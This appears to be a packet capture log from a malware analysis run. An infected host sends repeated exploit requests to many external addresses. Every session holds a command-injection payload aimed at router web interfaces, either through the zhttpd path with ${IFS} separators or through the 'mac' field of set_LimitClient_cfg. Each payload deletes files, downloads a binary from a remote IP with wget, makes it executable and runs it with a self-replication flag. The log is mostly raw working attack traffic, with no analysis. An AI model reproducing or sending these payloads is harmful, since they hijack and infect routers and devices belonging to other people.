                                        Jan 14, 2024 16:18:51.623197079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6272192.168.2.133966458.143.109.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623239040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6273192.168.2.1359192173.110.37.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623272896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6274192.168.2.1355508174.41.99.139443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623334885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6275192.168.2.1345408147.165.35.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623362064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6276192.168.2.134326431.90.47.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623409033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6277192.168.2.1358910147.207.214.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623466969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6278192.168.2.1356896205.236.15.201443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623487949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6279192.168.2.1343822176.198.80.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623541117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6280192.168.2.135196685.199.102.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623579025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6281192.168.2.1338510140.253.242.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623629093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6282192.168.2.13384909.250.101.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623648882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6283192.168.2.1341828131.56.251.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623686075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6284192.168.2.135401494.187.232.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623753071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6285192.168.2.133395879.146.4.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623770952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6286192.168.2.135751498.44.3.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623796940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6287192.168.2.1344410179.180.116.28443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623833895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6288192.168.2.134184066.204.192.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623878956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6289192.168.2.135850282.83.246.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623909950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6290192.168.2.135470073.184.240.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623951912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6291192.168.2.1348490173.169.248.181443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.623977900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6292192.168.2.1340138184.124.118.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624012947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6293192.168.2.134294077.5.237.44443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624061108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6294192.168.2.1334874164.73.53.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624126911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6295192.168.2.1347068121.194.164.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624152899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6296192.168.2.133575271.122.147.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624205112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6297192.168.2.134117240.78.188.205443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624222994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6298192.168.2.13356249.135.86.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624280930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6299192.168.2.1335560148.48.27.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624321938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6300192.168.2.1354280132.217.104.58443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624355078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6301192.168.2.134479099.45.208.189443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.624408007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6302192.168.2.1356478133.37.17.2098080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:51.880621910 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:52.816910028 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:54.673064947 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:58.512911081 CET228OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6303192.168.2.136069038.153.166.2258080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.354641914 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:52.464539051 CET1286INHTTP/1.1 400 Bad Request
                                        Server: squid/3.5.20
                                        Mime-Version: 1.0
                                        Date: Sun, 14 Jan 2024 15:18:52 GMT
                                        Content-Type: text/html;charset=utf-8
                                        Content-Length: 3469
                                        X-Squid-Error: ERR_INVALID_URL 0
                                        Connection: close
                                        Data Raw: 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 2f 73 71 75 69 64 2d 69 6e 74 65 72 6e 61 6c 2d 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 53 4e 2e 70 6e 67 27 29 20
                                        Data Ascii: <html><head><meta type="copyright" content="Copyright (C) 1996-2016 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2016 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('/squid-internal-static/icons/SN.png')


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6304192.168.2.134478879.136.23.1148080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.572237968 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:52.870189905 CET36INHTTP/1.1 403 Forbidden


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6305192.168.2.134419258.59.149.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633022070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6306192.168.2.1341848104.149.253.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633052111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6307192.168.2.1350224190.45.117.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633095026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6308192.168.2.134796025.71.174.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:52.633137941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
